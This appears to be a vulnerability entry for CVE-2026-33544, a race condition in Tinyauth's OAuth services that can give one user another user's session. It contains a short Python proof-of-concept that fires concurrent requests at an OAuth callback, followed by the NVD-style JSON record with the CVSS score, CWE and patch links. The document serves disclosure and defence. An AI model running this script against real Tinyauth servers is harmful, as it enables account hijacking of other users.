CVE-2026-33544

import requests import threading # Target URL url = "https://target.tinyauth/oauth/callback" # Simulate two user sessions attempting to login concurrently def exploit_session(user_id): # Payload or state parameter specific to the user payload = { 'state': f'my_state_{user_id}', 'code': 'auth_code_placeholder' } try: # Send the request to trigger the race condition response = requests.post(url, data=payload) print(f"User {user_id} response status: {response.status_code}") if response.status_code == 200: print(f"User {user_id} potentially logged in.") except Exception as e: print(f"Error for user {user_id}: {e}") # Create threads to simulate concurrent requests threads = [] for i in range(1, 3): t = threading.Thread(target=exploit_session, args=(i,)) threads.append(t) t.start() for t in threads: t.join() print("Exploit attempt finished. Check if User 1 received User 2's session.")

{"cve": {"id": "CVE-2026-33544", "sourceIdentifier": "[email protected]", "published": "2026-04-02T15:16:39.553", "lastModified": "2026-04-07T12:44:36.127", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tinyauth is an authentication and authorization server. Prior to version 5.0.5, all three OAuth service implementations (GenericOAuthService, GithubOAuthService, GoogleOAuthService) store PKCE verifiers and access tokens as mutable struct fields on singleton instances shared across all concurrent requests. When two users initiate OAuth login for the same provider concurrently, a race condition between VerifyCode() and Userinfo() causes one user to receive a session with the other user's identity. This issue has been patched in version 5.0.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tinyauth:tinyauth:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.0.5", "matchCriteriaId": "4087737A-5C88-47C1-BD17-FFAF32802EA6"}]}]}], "references": [{"url": "https://github.com/steveiliop56/tinyauth/commit/f26c2171610d5c2dfbba2edb6ccd39490e349803", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/steveiliop56/tinyauth/releases/tag/v5.0.5", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/steveiliop56/tinyauth/security/advisories/GHSA-9q5m-jfc4-wc92", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}